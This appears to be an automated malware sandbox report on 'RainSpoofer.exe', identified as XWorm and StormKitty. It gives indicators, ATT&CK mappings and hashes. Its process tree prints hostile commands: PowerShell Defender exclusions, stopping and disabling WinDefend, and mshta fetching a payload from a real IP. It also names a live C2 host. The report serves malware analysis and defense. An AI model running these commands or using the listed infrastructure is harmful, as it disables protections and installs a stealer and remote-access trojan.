Overview

overview

10

Static

static

3

RainSpoofer.exe

windows7-x64

10

Analysis

  • max time kernel
    776s
  • max time network
    773s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-01-2025 15:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RainSpoofer.exe

  • Size

    79KB

  • MD5

    d3a8594fc1452f12c757b13b35124ef3

  • SHA1

    3a3f12831496f23327c9dd746ae3ed1a23cfa30d

  • SHA256

    c61acd5b9f26fa5e7a8e4029791d47d665d9ae4813a79bab12fc05743eda51e7

  • SHA512

    d844f99a52c8abb19a67e83ba6ed22c856a506b8dc250aba1a5976aee5ffd897e47c9dc9ed607d4dd14b299ff70fffb00041773e0ffe47fc95bc6a68b5ffec97

  • SSDEEP

    1536:Zw47U6Uv4H7VZWg0HXsre6qYOM00ZMpwC07Bc7:Z2v4zWg0H8hEDwX7Bc7

Score
10/10
stormkittyxwormdefense_evasiondiscoveryevasionexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=61&4=7601&5=6&6=1&7=99600&8=1033

Extracted

Family

xworm

C2

trip-thesaurus.gl.at.ply.gg:16715

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\RainSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\RainSpoofer.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAZABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAeQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYwBiACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2360
    • C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe
      "C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OBSStudio-30.0-Full-Installer-x64.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SecurityHealthSystray'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1568
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\ualwvd.html
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:275457 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2672
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:340994 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2928
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1748 CREDAT:275490 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2328
      • C:\Windows\system32\CMD.EXE
        "CMD.EXE"
        3⤵
          PID:348
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
          C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken Your_Authtoken
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2832
        • C:\Windows\system32\cmd.exe
          cmd.exe /c start calc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1308
          • C:\Windows\system32\calc.exe
            calc
            4⤵
              PID:1816
          • C:\Windows\system32\cmd.exe
            cmd.exe
            3⤵
              PID:1384
            • C:\Windows\system32\cmd.exe
              cmd
              3⤵
                PID:2860
              • C:\Windows\system32\cmd.exe
                cmd.exe /c start cmd
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1632
                • C:\Windows\system32\cmd.exe
                  cmd
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2788
                  • C:\Windows\system32\ipconfig.exe
                    ipconfig
                    5⤵
                    • Gathers network information
                    PID:1868
              • C:\Users\Admin\AppData\Local\Temp\rzbuip.exe
                "C:\Users\Admin\AppData\Local\Temp\rzbuip.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:232
                • C:\Windows\SysWOW64\sc.exe
                  sc stop WinDefend
                  4⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2228
                • C:\Windows\SysWOW64\sc.exe
                  sc config WinDefend start= disabled
                  4⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:572
                • C:\Users\Admin\AppData\Roaming\ceoeta.exe
                  C:\Users\Admin\AppData\Roaming\ceoeta.exe
                  4⤵
                  • Modifies WinLogon for persistence
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2572
                  • C:\Windows\SysWOW64\sc.exe
                    sc stop WinDefend
                    5⤵
                    • Launches sc.exe
                    • System Location Discovery: System Language Discovery
                    PID:484
                  • C:\Windows\SysWOW64\sc.exe
                    sc config WinDefend start= disabled
                    5⤵
                    • Launches sc.exe
                    • System Location Discovery: System Language Discovery
                    PID:1200
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=KHBTHJFA&2=i-s&3=61&4=7601&5=6&6=1&7=99600&8=1033"
                    5⤵
                    • Blocklisted process makes network request
                    • System Location Discovery: System Language Discovery
                    PID:1464
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\rzbuip.exe" >> NUL
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:856
              • C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe
                "C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:940
          • C:\Windows\system32\AUDIODG.EXE
            C:\Windows\system32\AUDIODG.EXE 0x148
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
          • C:\Windows\system32\taskmgr.exe
            "C:\Windows\system32\taskmgr.exe" /4
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:716
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1032

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          2
          T1059

          PowerShell

          1
          T1059.001

          System Services

          2
          T1569

          Service Execution

          2
          T1569.002

          Persistence

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Winlogon Helper DLL

          1
          T1547.004

          Create or Modify System Process

          2
          T1543

          Windows Service

          2
          T1543.003

          Privilege Escalation

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Winlogon Helper DLL

          1
          T1547.004

          Create or Modify System Process

          2
          T1543

          Windows Service

          2
          T1543.003

          Defense Evasion

          Impair Defenses

          1
          T1562

          Indicator Removal

          1
          T1070

          File Deletion

          1
          T1070.004

          Modify Registry

          3
          T1112

          Obfuscated Files or Information

          1
          T1027

          Command Obfuscation

          1
          T1027.010

          Credential Access

          Credentials from Password Stores

          1
          T1555

          Credentials from Web Browsers

          1
          T1555.003

          Unsecured Credentials

          1
          T1552

          Credentials In Files

          1
          T1552.001

          Discovery

          Browser Information Discovery

          1
          T1217

          System Information Discovery

          2
          T1082

          System Location Discovery

          1
          T1614

          System Language Discovery

          1
          T1614.001

          Lateral Movement

          Collection

          Data from Local System

          1
          T1005

          Command and Control

          Exfiltration

          Impact

          Service Stop

          2
          T1489

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            73ac28fa873a0776b2872676e1974687

            SHA1

            576e7b7e9a591dc6cefcd5bdfed5e38d3920f5b7

            SHA256

            79c48738e1ab7d38226dcf64996b63d6bc84a92cd4910751473602376f9432a7

            SHA512

            6de800abdcc1a2f2d19900c41bd9f05c3003b945fc7ec426c0a3b4011ed0cbc8bc362c480588abfdd0645ee11fdcc18e84d88733da738320c47b7f422ae1711b

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            a51d1ce4a04b6b96a547c82b941cf90d

            SHA1

            9cc63d1ea8f0dfb9658d6298e136cb26decd44c1

            SHA256

            86253532a45e6ae4722b6724d65e98b64cb33dd04f2a42950076620b5bc3f882

            SHA512

            4d62e9f8cacb88f19b959230929b4ea091a04c23e1477d38511d6ab3bbdf1184ab1a969392b768e3114098a9d5399886ab6f9fcb1b2f5772253fb6413c0e8dfb

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            16d6c9fe1abff9f5476367bbc43b2211

            SHA1

            f7bcffb4f2f60c974fc9341dccf262f151dc3ea3

            SHA256

            0db6ecc999db950d986883e3ffa03e06c56ac8c2fc7d9056cae9fdf58aae347e

            SHA512

            d95ac189911faaaa0ae77e15f3952bf1550caefd998d5d69746147f4e12ed9afec7e0c3031471a08ebf9106a07ebfb545251c7afdebb4845d3305345619fe93c

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            5e007662679748f73853d36b5f442d25

            SHA1

            8dd2d476bbe1a3ec739aab606a0a0f51ef993b98

            SHA256

            a94949a98ba25df0879a012e4b10a703d5a4082766c2e21de27a342c2fe78928

            SHA512

            b29b80feb4d4496dffb982d1e82007030eb4667caee55f7e7ed4bdf2fa51a66a57ffc20dcd1711fb862de6554f78aca938a9cf00be1d9b33885db9daf4a03d8e

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            aa7ba30b2d9aa1217674eb3964a42466

            SHA1

            56000004eafd8c4ebcf4c0e6e04bf923da4b39ca

            SHA256

            7cfb52b58c89b95c277d829bd47757572a72074f9ab4246007daa725af4619ca

            SHA512

            466c327a9b95e9096ef1f84383805f99663fb9dc608ef64b7383dbd0577679e5a6f032a065b1f09f0303ab74805f8fde98c70ba704187a6a1f1aaf92142a6680

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            f7502fd3a502c6b1451d2a0d9a238f55

            SHA1

            41381175e7ffc5abdd513a04ab64c77899d79b74

            SHA256

            527325f68157e3ed7f49c610ab01af902f062a8fca0d1b990ef5eef87da76bb5

            SHA512

            422e22f871bb72ee7640589bdb13fd2bd13ef090a32944d6dd2736020732469cd0098ce7b590cc81c70932388f9ad1ed12d86074c777333317745cce922a08a5

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            e6c9be6a5a7f19a00994732c53794eeb

            SHA1

            ca2313064cd83644251336d1b8a9a4e5a3db8ddf

            SHA256

            147b1ec0ccca54093bd29bf94d2bf8bf1b65cf07805bc37b5d9a8170b48edbc3

            SHA512

            928d58498466f6fe096a6d736f4341bc3dc02bb50a127675f3f5797e7f083e1619c8e0ff73568ab084f5e92c47617924a522b9e21e95048794f630fa4a3ba5d6

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            290b77bc808aad185fec63e23d822cf9

            SHA1

            fe6e9ee3956af880ada84128640679fcde3ec60d

            SHA256

            4918443af2e267ba3c7061fe5b3310dc2df6ae51a0173139ec6cf30b5e3bb555

            SHA512

            6d7a90c2b4addea631307490c82b7314c5572530b8e292dcbf165261da9ac55d33f75a5d700519cf9e10db10329f4a4d2cbcf04ef2bfcbf3a4a31b5f53e28f91

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            6534f527f4b1c9f1b892d39ae093954f

            SHA1

            4a32a4f751b20e400333cdabebc8658997630e4b

            SHA256

            7c921eb6871b7331bb12b824ee16ea7291d3ea3a5847d69fc02a96326fc42535

            SHA512

            3f38d0fe7006f19af71e12af25fd79ffdac87f3cfe9b648a4e3d7c2f1c96e9d1fa204e075de37984d326b01c55619a27776f3804908cf205059c3ec67436c58c

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            d36480a2732e0551e8b4382ce3f5f9d5

            SHA1

            b3acdeed77a1958ed93629c1aef90430c381c53f

            SHA256

            caa7617523e5fb3443e24196f3d320f6cb12b34de8b8b53f3a25b88b62663a00

            SHA512

            a864fefacfa341b7f93b10236beafb000975063adf70b5e63838e7128e3ac34d77546ddfa4218211a7ab4ca1a87cfb59d6ff1b443f29f8a84737fd3c555afd61

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            2b282c9c713be0473f35a80703f0e6f1

            SHA1

            474109f65010eaaa543336a737fa8659181945e9

            SHA256

            be537b5c901c129f9c62e1b6f04cedf40fec100eef9048cd62c26b202e950d23

            SHA512

            e2e989f67e44414fa711a1bfb64ba5618663b52b60017db30ea30a252588e8791768ccfc989ad1362dc8b0fba5f8a3b8884bc9b28846e9b7bdb6cc9ccbbcb91b

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            561d64917fd49ff247454f6ec0320090

            SHA1

            fb3b8abf8e9ce25fc0eb7b438dc6c14fda839cae

            SHA256

            20008c1935298189d0c6f1ba5cf46ff5a05b1f6c49c0031a416d50a1db8ec41b

            SHA512

            53cbe035e33bc02864b4191708cc02c7b838f47040b1be68d0e37ace17228c27a0db0426213c28c235c921dae77f8fc62e5fd5f75a92737d4c347538002518be

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            caec795297641d9ba6455cfb51bf2f5b

            SHA1

            4cc5817f23da046b1c247dc9597092ba762541f3

            SHA256

            cafced0549661fa0e7948ad687acbe935d0ff40daca34fff6f50f0c845b6722a

            SHA512

            83ca7679fc502f6c29e92de0797c96a7c675e6208a89bca0f2c2f848c738c9baec3a3eb1e795544eea52e10618c560cd1a85203db3d3dddf3cea5b98c5c1ffae

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            d240c6c81e2d761d5d513cf0ecb9376e

            SHA1

            b30a6de6ab5e0b157f3538223c74ed1b6be6f33e

            SHA256

            26d4bfef45bcc7ead274f39ba5dafb017d2214a0e475e1975586ab3000c3097f

            SHA512

            7177320a1b1f758d02791a4eb593f5bac3b8963359a7f852f60aa0dcc5709e380a1b50fdb9cf058fd69e071144773519fc6c6660b379f0d8d94b1f7d196e1260

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            b1d514f1fb516d2b15b34ffa5b378066

            SHA1

            93107f308c10e993a4a22c9459f59b87b9434484

            SHA256

            edc442c619bcc40d42461f8881e4bb027c9bddeffa9501703964f28ecd5b6680

            SHA512

            09634a1bebadcdc58d955d9f37aa793387230ac26b10741d9256943f31c5014ec46b6c83b763b3c4b2d75fc983b580a58d345f1e892a014343ed77142a04aac8

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            87d9556edf0d81aaa294104fa3259365

            SHA1

            4b1a9cb8934302ebe01c2562488c022b927f40d3

            SHA256

            c0b2c9f034393bbbc9603e19ba37a5f9669bde92bfe4d205d49ec31d6aa3a09c

            SHA512

            baa0ad1c4fc3ee7c8ac15694cd4a10ce9efc42174d36d3f4521fff2ca11045b97e76d1d1c7cfc0f30e79e881507e227255b41be7943bbe856dff9d1110cc87de

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            dbe6a47ba659d7d217bef2c0352e35bc

            SHA1

            41d12f1b0b8befe2e7d895f029e69a1ef358565c

            SHA256

            80f9f64557b2f476b2539966f7b8bb226edafceeea9e8fd11f2bc58699494dd3

            SHA512

            45f6d013d8a8b555c92f2731d4db0a6e6faf2745ec267157fd8fd6f906e8defb8f1d0aeed5726554e55c4094874baaf6868d0ca938152c20c37e1770e04efc05

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            054013d38e6fcb11c837073e358360ee

            SHA1

            b16ed1414a31792e3b6e49ec8d9ec2a41d57d518

            SHA256

            875c57af850dc079ed94418716733038965f6c261c9f89922ba22b3480f67687

            SHA512

            7fb70b8216b863e93e3888d739ae06bb029a47c567e96827217deb8d7d635e8392a4195f04d7ab2b8d09448a896788d494b7454525e92e4e0738f7f906f39be5

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            342B

            MD5

            cc58263d759ef8c8ddab728f1eb9733b

            SHA1

            2ed4d85f34bb373dc9cc8d71dfa2ecf2dcf90ab4

            SHA256

            c6e9b9bdb5ab75cb1ee100a1e89167d6995fd490f8948c09e582071fcb78483e

            SHA512

            a45de17f10ba1d2e98d7333581899f95d44e6486788c23da451bc351db0009a0bd0540a4c364966090052748d56698359989c6044f326475c4009d98a3851f5d

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\CabC719.tmp
            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\TarC78A.tmp
            Filesize

            181KB

            MD5

            4ea6026cf93ec6338144661bf1202cd1

            SHA1

            a1dec9044f750ad887935a01430bf49322fbdcb7

            SHA256

            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

            SHA512

            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\kvcsdt.exe
            Filesize

            666KB

            MD5

            989ae3d195203b323aa2b3adf04e9833

            SHA1

            31a45521bc672abcf64e50284ca5d4e6b3687dc8

            SHA256

            d30d7676a3b4c91b77d403f81748ebf6b8824749db5f860e114a8a204bca5b8f

            SHA512

            e9d4e6295869f3a456c7ea2850c246d0c22afa65c2dd5161744ee5b3e29e44d9a2d758335f98001cdb348eaa51a71cd441b4ddc12c8d72509388657126e69305

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
            Filesize

            16.4MB

            MD5

            ee2397b5f70e81dd97a4076ba1cb1d3a

            SHA1

            8350f648ebd269b4bca720b4143dd3edcdfafa8f

            SHA256

            b5b1454e2e3a66edf3bde92b29a4f4b324fa3c3d88dc28e378c22cb42237cc67

            SHA512

            57fc76393881c504ac4c37a8ea812a7e21f2bed4ffa4de42a2e6e4558a78bba679ec0f8fcdc39798306c3a97e424fb875680b7f78ac07be3f7f58df093575562

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\rzbuip.exe
            Filesize

            2.2MB

            MD5

            7dde6427dcf06d0c861693b96ad053a0

            SHA1

            086008ecfe06ad06f4c0eee2b13530897146ae01

            SHA256

            077c04ee44667c5e1024652a7bbe7fff81360ef128245ffd4cd843b7a56227cf

            SHA512

            8cf162f83ebfa2f3db54b10d5b0e6af590e97596ac2d469058a98340bf27de2866e679c777aa46dd530db44c27503d4cea8c34d96cb83b71477a806b5ab7c1b9

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\ualwvd.html
            Filesize

            4KB

            MD5

            fdf28aff8eae344f0da5daebf2cad646

            SHA1

            fb8901df1e495e1336b5c0199d5fcea0dc5e23bc

            SHA256

            886672dec37fc05765bb5a8ffd357f9122e05d971f77ed3b7f723d81ad7de4f6

            SHA512

            542be402525600bcbe8c2b953057aba223d5f22dda5b261d7ad7d5d5213d500a0e8e7f6331105040b511bfdf0b301496fa99bc93f0d16d212f507bd13810db63

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\~DF104C860C883EBA9F.TMP
            Filesize

            16KB

            MD5

            5d0eca7a0bd2fc4b3617155208ec201a

            SHA1

            1220a3af934d9e89236b59476601922ecc8df9ec

            SHA256

            6b50d23e71d49005887d3fde772cf921bf72bf16eba1db883fe280d27878f303

            SHA512

            75ee27c8bfc0ed2328374fdc719eb1771535743f782249133255c84ca5883ee147b2fb7b850cc8d9ece2b5e49234657c8c88df80aef558a9b54de9c2e8d58b55

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UI5UKI2HFFY7GT7YWAMR.temp
            Filesize

            7KB

            MD5

            051c06271a6b2e3a3e953d8587063cab

            SHA1

            72218dea89cfd8b40ea91f4b91a073b00e6806b8

            SHA256

            a5bbcf018c54bf3b8645183eb843ff58fb48533a7f6c51fd209eaceb3694b0b3

            SHA512

            05d3bce780fd12e4c7f6a3c249c20e1acc76e67b7225994ef05f99db24893af4d7fe2bc5019dd4c88b1566861f68f4b9a61685fe0ab0aac09be132c01767e460

            Download Submit

          • C:\Users\Admin\AppData\Roaming\OBSStudio-30.0-Full-Installer-x64.exe
            Filesize

            73KB

            MD5

            798979d8ea2bfdd4beaa6bcfb0d1525d

            SHA1

            98fe241fb460c7b2ef6d934425751afc7d41fd3c

            SHA256

            02ecf9cda88cc034e10bc28e8d7895705483b5f088b5658ad28d000ca8474eb9

            SHA512

            ec712552ec27d5befa1fae10d0785e04014a94b8786ec5b6645e171136a93d824aa103dd2635941c9f50b88039812d868839c7779f85b0a2cca53aacfe145499

            Download Submit

          • memory/232-984-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

            Download

          • memory/232-996-0x0000000000400000-0x0000000000843000-memory.dmp

            Filesize

            4.3MB

            Download

          • memory/232-994-0x00000000047E0000-0x0000000004C23000-memory.dmp

            Filesize

            4.3MB

            Download

          • memory/716-473-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

            Download

          • memory/716-479-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

            Download

          • memory/716-472-0x0000000140000000-0x00000001405E8000-memory.dmp

            Filesize

            5.9MB

            Download

